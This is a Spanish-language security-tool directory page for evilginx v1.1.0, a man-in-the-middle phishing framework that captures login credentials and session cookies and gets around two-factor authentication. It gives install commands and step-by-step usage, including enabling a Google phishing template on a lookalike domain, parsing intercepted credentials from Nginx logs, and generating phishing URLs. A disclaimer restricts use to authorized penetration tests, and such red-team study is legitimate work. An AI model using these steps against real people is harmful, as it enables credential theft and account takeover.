Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
evilginx — POR FAVOR, USE LA NUEVA VERSIÓN: https://github.com/kgretzky/evilginx2 | Kitploit
Herramientas/GitHubGitHub/kgretzky/evilginx
Herramientas de PhishingExplotación de Aplicaciones WebPhishingPruebas de PenetraciónIngeniería SocialAutenticaciónRed Teaming
GitHubkgretzky/evilginx

evilginx

POR FAVOR, USE LA NUEVA VERSIÓN: https://github.com/kgretzky/evilginx2

Ver Repositorio
1.2k281hace 8 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Evilginx v.1.1.0

Evilginx

ESTA VERSIÓN ESTÁ OBSOLETA. ¡USE LA VERSIÓN MÁS RECIENTE!

EVILGINX 2: https://github.com/kgretzky/evilginx2

Evilginx es un framework de ataque man-in-the-middle utilizado para suplantar credenciales y cookies de sesión de cualquier servicio web. Su núcleo se ejecuta en el servidor HTTP Nginx, que utiliza proxy_pass y sub_filter para proxy y modificar contenido HTTP, mientras intercepta el tráfico entre el cliente y el servidor.

Puedes aprender cómo funciona y cómo instalar todo tú mismo en mi blog:

Primera publicación ligeramente desactualizada ahora: Evilginx - Phishing Avanzado con Bypass de Autenticación de Dos Factores

Actualización de Evilginx 1.0: Evilginx 1.0 Update - Mejora tu Juego en Phishing 2FA

Actualización de Evilginx 1.1: Evilginx 1.1 Update

Descargo de responsabilidad

Soy consciente de que Evilginx puede ser utilizado para fines muy nefastos. Este trabajo es simplemente una demostración de lo que atacantes hábiles pueden hacer. Es responsabilidad del defensor tomar en cuenta tales ataques al configurar las defensas y encontrar formas de protegerse contra este método de phishing. Evilginx debe ser utilizado solo en asignaciones legítimas de pruebas de penetración con permiso por escrito de las partes a ser suplantadas.

Salón de la Fama de Contribuyentes

@poweroftrue

Instalación

Evilginx proporciona un script de instalación install.sh que se encarga de instalar todo el paquete en cualquier máquina Debian wheezy/jessie, de manera automática.

root@kitploit:~
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

Uso

root@kitploit:~
            _ _       _           
           (_) |     (_)          
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit
Configuración

Habilita o deshabilita configuraciones de sitios para usar con el servidor Nginx, utilizando las plantillas de Evilginx proporcionadas del directorio sites.

root@kitploit:~
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

Lista las plantillas de configuración de sitios disponibles:

root@kitploit:~
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

Habilita el sitio de phishing de google con un dominio de phishing preregistrado not-really-google.com:

root@kitploit:~
python evilginx.py setup --enable google -d not-really-google.com

Deshabilita el sitio de phishing de facebook:

root@kitploit:~
python evilginx.py setup --disable facebook
Analizar

Analiza los registros de Nginx para extraer credenciales de inicio de sesión y cookies de sesión interceptadas. Los registros, por defecto, se guardan en el directorio logs, donde reside el script evilginx.py. Esto se puede hacer automáticamente después de habilitar el auto-análisis en la fase de Configuración.

root@kitploit:~
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

Analiza registros solo para el sitio de google:

root@kitploit:~
python evilginx.py parse -s google

Analiza registros para todos los sitios disponibles:

root@kitploit:~
python evilginx.py parse -s all
Generar URL

Genera URLs de phishing que puedas usar en tus evaluaciones de Red Team.

root@kitploit:~
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

Genera una URL de phishing de google que redirigirá a la víctima al video de rick'roll al iniciar sesión correctamente:

root@kitploit:~
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
Descargar herramienta